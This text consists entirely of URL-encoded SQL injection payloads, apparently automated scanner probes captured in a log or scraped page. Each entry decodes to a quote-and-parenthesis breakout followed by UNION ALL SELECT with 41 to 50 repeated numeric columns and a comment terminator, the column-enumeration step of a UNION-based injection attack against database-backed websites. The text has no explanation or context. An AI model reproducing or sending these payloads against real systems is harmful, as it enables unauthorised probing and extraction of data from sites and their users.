-4213%27%29%29%29%20UNION%20ALL%20SELECT%208843%2C8843%2C8843%2C8843%2C8843%2C8843%2C8843%2C8843%2C8843%2C8843%2C8843%2C8843%2C8843%2C8843%2C8843%2C8843%2C8843%2C8843%2C8843%2C8843%2C8843%2C8843%2C8843%2C8843%2C8843%2C8843%2C8843%2C8843%2C8843%2C8843%2C8843%2C8843%2C8843%2C8843%2C8843%2C8843%2C8843%2C8843%2C8843%2C8843%2C8843%2C8843%2C8843%2C8843%23 -5579%27%29%29%29%20UNION%20ALL%20SELECT%204287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%23 -8363%27%29%29%29%20UNION%20ALL%20SELECT%201109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%23 -7667%27%29%29%29%20UNION%20ALL%20SELECT%208616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%23 -6218%27%29%29%29%20UNION%20ALL%20SELECT%207067%2C7067%2C7067%2C7067%2C7067%2C7067%2C7067%2C7067%2C7067%2C7067%2C7067%2C7067%2C7067%2C7067%2C7067%2C7067%2C7067%2C7067%2C7067%2C7067%2C7067%2C7067%2C7067%2C7067%2C7067%2C7067%2C7067%2C7067%2C7067%2C7067%2C7067%2C7067%2C7067%2C7067%2C7067%2C7067%2C7067%2C7067%2C7067%2C7067%2C7067%2C7067%2C7067%2C7067%2C7067%2C7067%2C7067%2C7067%23 -7218%27%29%29%29%20UNION%20ALL%20SELECT%209290%2C9290%2C9290%2C9290%2C9290%2C9290%2C9290%2C9290%2C9290%2C9290%2C9290%2C9290%2C9290%2C9290%2C9290%2C9290%2C9290%2C9290%2C9290%2C9290%2C9290%2C9290%2C9290%2C9290%2C9290%2C9290%2C9290%2C9290%2C9290%2C9290%2C9290%2C9290%2C9290%2C9290%2C9290%2C9290%2C9290%2C9290%2C9290%2C9290%2C9290%2C9290%2C9290%2C9290%2C9290%2C9290%2C9290%2C9290%2C9290%23 -8498%27%29%29%29%20UNION%20ALL%20SELECT%204814%2C4814%2C4814%2C4814%2C4814%2C4814%2C4814%2C4814%2C4814%2C4814%2C4814%2C4814%2C4814%2C4814%2C4814%2C4814%2C4814%2C4814%2C4814%2C4814%2C4814%2C4814%2C4814%2C4814%2C4814%2C4814%2C4814%2C4814%2C4814%2C4814%2C4814%2C4814%2C4814%2C4814%2C4814%2C4814%2C4814%2C4814%2C4814%2C4814%2C4814%2C4814%2C4814%2C4814%2C4814%2C4814%2C4814%2C4814%2C4814%2C4814%23 -8930%27%20UNION%20ALL%20SELECT%205475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%23 -2865%27%20UNION%20ALL%20SELECT%209331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%23 -6317%27%20UNION%20ALL%20SELECT%204569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%23 -9460%27%20UNION%20ALL%20SELECT%203474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%23 -9040%27%20UNION%20ALL%20SELECT%209989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%23 -3979%27%20UNION%20ALL%20SELECT%204647%2C4647%2C4647%2C4647%2C4647%2C4647%2C4647%2C4647%2C4647%2C4647%2C4647%2C4647%2C4647%2C4647%2C4647%2C4647%2C4647%2C4647%2C4647%2C4647%2C4647%2C4647%2C4647%2C4647%2C4647%2C4647%2C4647%2C4647%2C4647%2C4647%2C4647%2C4647%2C4647%2C4647%2C4647%2C4647%2C4647%2C4647%2C4647%2C4647%2C4647%2C4647%2C4647%2C4647%2C4647%2C4647%23 -7369%27%20UNION%20ALL%20SELECT%202161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%23 -3732%27%20UNION%20ALL%20SELECT%202413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%23 -3028%27%20UNION%20ALL%20SELECT%204194%2C4194%2C4194%2C4194%2C4194%2C4194%2C4194%2C4194%2C4194%2C4194%2C4194%2C4194%2C4194%2C4194%2C4194%2C4194%2C4194%2C4194%2C4194%2C4194%2C4194%2C4194%2C4194%2C4194%2C4194%2C4194%2C4194%2C4194%2C4194%2C4194%2C4194%2C4194%2C4194%2C4194%2C4194%2C4194%2C4194%2C4194%2C4194%2C4194%2C4194%2C4194%2C4194%2C4194%2C4194%2C4194%2C4194%2C4194%2C4194%23 -6646%27%20UNION%20ALL%20SELECT%206723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%23 -6238%22%29%20UNION%20ALL%20SELECT%205496%2C5496%2C5496%2C5496%2C5496%2C5496%2C5496%2C5496%2C5496%2C5496%2C5496%2C5496%2C5496%2C5496%2C5496%2C5496%2C5496%2C5496%2C5496%2C5496%2C5496%2C5496%2C5496%2C5496%2C5496%2C5496%2C5496%2C5496%2C5496%2C5496%2C5496%2C5496%2C5496%2C5496%2C5496%2C5496%2C5496%2C5496%2C5496%2C5496%2C5496%23 -9082%22%29%20UNION%20ALL%20SELECT%204984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%23 -7025%22%29%20UNION%20ALL%20SELECT%209298%2C9298%2C9298%2C9298%2C9298%2C9298%2C9298%2C9298%2C9298%2C9298%2C9298%2C9298%2C9298%2C9298%2C9298%2C9298%2C9298%2C9298%2C9298%2C9298%2C9298%2C9298%2C9298%2C9298%2C9298%2C9298%2C9298%2C9298%2C9298%2C9298%2C9298%2C9298%2C9298%2C9298%2C9298%2C9298%2C9298%2C9298%2C9298%2C9298%2C9298%2C9298%2C9298%23 -7571%22%29%20UNION%20ALL%20SELECT%205744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%23 -6395%22%29%20UNION%20ALL%20SELECT%206067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%23 -8171%22%29%20UNION%20ALL%20SELECT%203297%2C3297%2C3297%2C3297%2C3297%2C3297%2C3297%2C3297%2C3297%2C3297%2C3297%2C3297%2C3297%2C3297%2C3297%2C3297%2C3297%2C3297%2C3297%2C3297%2C3297%2C3297%2C3297%2C3297%2C3297%2C3297%2C3297%2C3297%2C3297%2C3297%2C3297%2C3297%2C3297%2C3297%2C3297%2C3297%2C3297%2C3297%2C3297%2C3297%2C3297%2C3297%2C3297%2C3297%2C3297%2C3297%23 -2797%22%29%20UNION%20ALL%20SELECT%209194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%23 -8826%22%29%20UNION%20ALL%20SELECT%203723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%23 -8236%22%29%20UNION%20ALL%20SELECT%201873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%23 -9541%22%29%20UNION%20ALL%20SELECT%207447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%23 -1929%22%29%29%20UNION%20ALL%20SELECT%205281%2C5281%2C5281%2C5281%2C5281%2C5281%2C5281%2C5281%2C5281%2C5281%2C5281%2C5281%2C5281%2C5281%2C5281%2C5281%2C5281%2C5281%2C5281%2C5281%2C5281%2C5281%2C5281%2C5281%2C5281%2C5281%2C5281%2C5281%2C5281%2C5281%2C5281%2C5281%2C5281%2C5281%2C5281%2C5281%2C5281%2C5281%2C5281%2C5281%2C5281%23 -2110%22%29%29%20UNION%20ALL%20SELECT%203622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%23 -7055%22%29%29%20UNION%20ALL%20SELECT%209163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%23 -9866%22%29%29%20UNION%20ALL%20SELECT%204628%2C4628%2C4628%2C4628%2C4628%2C4628%2C4628%2C4628%2C4628%2C4628%2C4628%2C4628%2C4628%2C4628%2C4628%2C4628%2C4628%2C4628%2C4628%2C4628%2C4628%2C4628%2C4628%2C4628%2C4628%2C4628%2C4628%2C4628%2C4628%2C4628%2C4628%2C4628%2C4628%2C4628%2C4628%2C4628%2C4628%2C4628%2C4628%2C4628%2C4628%2C4628%2C4628%2C4628%23 -6149%22%29%29%20UNION%20ALL%20SELECT%204349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%23 -9028%22%29%29%20UNION%20ALL%20SELECT%206128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%23 -5883%22%29%29%20UNION%20ALL%20SELECT%205426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%23 -7500%22%29%29%20UNION%20ALL%20SELECT%206872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%23 -8722%22%29%29%20UNION%20ALL%20SELECT%207879%2C7879%2C7879%2C7879%2C7879%2C7879%2C7879%2C7879%2C7879%2C7879%2C7879%2C7879%2C7879%2C7879%2C7879%2C7879%2C7879%2C7879%2C7879%2C7879%2C7879%2C7879%2C7879%2C7879%2C7879%2C7879%2C7879%2C7879%2C7879%2C7879%2C7879%2C7879%2C7879%2C7879%2C7879%2C7879%2C7879%2C7879%2C7879%2C7879%2C7879%2C7879%2C7879%2C7879%2C7879%2C7879%2C7879%2C7879%2C7879%23 -3796%22%29%29%20UNION%20ALL%20SELECT%205548%2C5548%2C5548%2C5548%2C5548%2C5548%2C5548%2C5548%2C5548%2C5548%2C5548%2C5548%2C5548%2C5548%2C5548%2C5548%2C5548%2C5548%2C5548%2C5548%2C5548%2C5548%2C5548%2C5548%2C5548%2C5548%2C5548%2C5548%2C5548%2C5548%2C5548%2C5548%2C5548%2C5548%2C5548%2C5548%2C5548%2C5548%2C5548%2C5548%2C5548%2C5548%2C5548%2C5548%2C5548%2C5548%2C5548%2C5548%2C5548%2C5548%23 -5871%22%29%29%29%20UNION%20ALL%20SELECT%203111%2C3111%2C3111%2C3111%2C3111%2C3111%2C3111%2C3111%2C3111%2C3111%2C3111%2C3111%2C3111%2C3111%2C3111%2C3111%2C3111%2C3111%2C3111%2C3111%2C3111%2C3111%2C3111%2C3111%2C3111%2C3111%2C3111%2C3111%2C3111%2C3111%2C3111%2C3111%2C3111%2C3111%2C3111%2C3111%2C3111%2C3111%2C3111%2C3111%2C3111%23 -7647%22%29%29%29%20UNION%20ALL%20SELECT%209223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%23 -5601%22%29%29%29%20UNION%20ALL%20SELECT%203866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%23 -8161%22%29%29%29%20UNION%20ALL%20SELECT%209216%2C9216%2C9216%2C9216%2C9216%2C9216%2C9216%2C9216%2C9216%2C9216%2C9216%2C9216%2C9216%2C9216%2C9216%2C9216%2C9216%2C9216%2C9216%2C9216%2C9216%2C9216%2C9216%2C9216%2C9216%2C9216%2C9216%2C9216%2C9216%2C9216%2C9216%2C9216%2C9216%2C9216%2C9216%2C9216%2C9216%2C9216%2C9216%2C9216%2C9216%2C9216%2C9216%2C9216%23 -8348%22%29%29%29%20UNION%20ALL%20SELECT%205803%2C5803%2C5803%2C5803%2C5803%2C5803%2C5803%2C5803%2C5803%2C5803%2C5803%2C5803%2C5803%2C5803%2C5803%2C5803%2C5803%2C5803%2C5803%2C5803%2C5803%2C5803%2C5803%2C5803%2C5803%2C5803%2C5803%2C5803%2C5803%2C5803%2C5803%2C5803%2C5803%2C5803%2C5803%2C5803%2C5803%2C5803%2C5803%2C5803%2C5803%2C5803%2C5803%2C5803%2C5803%23 -7845%22%29%29%29%20UNION%20ALL%20SELECT%206466%2C6466%2C6466%2C6466%2C6466%2C6466%2C6466%2C6466%2C6466%2C6466%2C6466%2C6466%2C6466%2C6466%2C6466%2C6466%2C6466%2C6466%2C6466%2C6466%2C6466%2C6466%2C6466%2C6466%2C6466%2C6466%2C6466%2C6466%2C6466%2C6466%2C6466%2C6466%2C6466%2C6466%2C6466%2C6466%2C6466%2C6466%2C6466%2C6466%2C6466%2C6466%2C6466%2C6466%2C6466%2C6466%23 -6155%22%29%29%29%20UNION%20ALL%20SELECT%201837%2C1837%2C1837%2C1837%2C1837%2C1837%2C1837%2C1837%2C1837%2C1837%2C1837%2C1837%2C1837%2C1837%2C1837%2C1837%2C1837%2C1837%2C1837%2C1837%2C1837%2C1837%2C1837%2C1837%2C1837%2C1837%2C1837%2C1837%2C1837%2C1837%2C1837%2C1837%2C1837%2C1837%2C1837%2C1837%2C1837%2C1837%2C1837%2C1837%2C1837%2C1837%2C1837%2C1837%2C1837%2C1837%2C1837%23 -9245%22%29%29%29%20UNION%20ALL%20SELECT%205028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%23 -9881%22%29%29%29%20UNION%20ALL%20SELECT%204326%2C4326%2C4326%2C4326%2C4326%2C4326%2C4326%2C4326%2C4326%2C4326%2C4326%2C4326%2C4326%2C4326%2C4326%2C4326%2C4326%2C4326%2C4326%2C4326%2C4326%2C4326%2C4326%2C4326%2C4326%2C4326%2C4326%2C4326%2C4326%2C4326%2C4326%2C4326%2C4326%2C4326%2C4326%2C4326%2C4326%2C4326%2C4326%2C4326%2C4326%2C4326%2C4326%2C4326%2C4326%2C4326%2C4326%2C4326%2C4326%23 -1288%22%29%29%29%20UNION%20ALL%20SELECT%203241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%23 -3800%22%20UNION%20ALL%20SELECT%209009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%23 -7744%22%20UNION%20ALL%20SELECT%205499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%23 -3201%22%20UNION%20ALL%20SELECT%205383%2C5383%2C5383%2C5383%2C5383%2C5383%2C5383%2C5383%2C5383%2C5383%2C5383%2C5383%2C5383%2C5383%2C5383%2C5383%2C5383%2C5383%2C5383%2C5383%2C5383%2C5383%2C5383%2C5383%2C5383%2C5383%2C5383%2C5383%2C5383%2C5383%2C5383%2C5383%2C5383%2C5383%2C5383%2C5383%2C5383%2C5383%2C5383%2C5383%2C5383%2C5383%2C5383%23 -4838%22%20UNION%20ALL%20SELECT%201360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%23 -3151%22%20UNION%20ALL%20SELECT%202340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%23 -2298%22%20UNION%20ALL%20SELECT%202608%2C2608%2C2608%2C2608%2C2608%2C2608%2C2608%2C2608%2C2608%2C2608%2C2608%2C2608%2C2608%2C2608%2C2608%2C2608%2C2608%2C2608%2C2608%2C2608%2C2608%2C2608%2C2608%2C2608%2C2608%2C2608%2C2608%2C2608%2C2608%2C2608%2C2608%2C2608%2C2608%2C2608%2C2608%2C2608%2C2608%2C2608%2C2608%2C2608%2C2608%2C2608%2C2608%2C2608%2C2608%2C2608%23 -1134%22%20UNION%20ALL%20SELECT%204574%2C4574%2C4574%2C4574%2C4574%2C4574%2C4574%2C4574%2C4574%2C4574%2C4574%2C4574%2C4574%2C4574%2C4574%2C4574%2C4574%2C4574%2C4574%2C4574%2C4574%2C4574%2C4574%2C4574%2C4574%2C4574%2C4574%2C4574%2C4574%2C4574%2C4574%2C4574%2C4574%2C4574%2C4574%2C4574%2C4574%2C4574%2C4574%2C4574%2C4574%2C4574%2C4574%2C4574%2C4574%2C4574%2C4574%23 -7800%22%20UNION%20ALL%20SELECT%204654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%23 -8602%22%20UNION%20ALL%20SELECT%204818%2C4818%2C4818%2C4818%2C4818%2C4818%2C4818%2C4818%2C4818%2C4818%2C4818%2C4818%2C4818%2C4818%2C4818%2C4818%2C4818%2C4818%2C4818%2C4818%2C4818%2C4818%2C4818%2C4818%2C4818%2C4818%2C4818%2C4818%2C4818%2C4818%2C4818%2C4818%2C4818%2C4818%2C4818%2C4818%2C4818%2C4818%2C4818%2C4818%2C4818%2C4818%2C4818%2C4818%2C4818%2C4818%2C4818%2C4818%2C4818%23 -3103%22%20UNION%20ALL%20SELECT%205733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%23 -3680%22%29%20UNION%20ALL%20SELECT%203793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%23 -3215%22%29%20UNION%20ALL%20SELECT%207203%2C7203%2C7203%2C7203%2C7203%2C7203%2C7203%2C7203%2C7203%2C7203%2C7203%2C7203%2C7203%2C7203%2C7203%2C7203%2C7203%2C7203%2C7203%2C7203%2C7203%2C7203%2C7203%2C7203%2C7203%2C7203%2C7203%2C7203%2C7203%2C7203%2C7203%2C7203%2C7203%2C7203%2C7203%2C7203%2C7203%2C7203%2C7203%2C7203%2C7203%2C7203%23 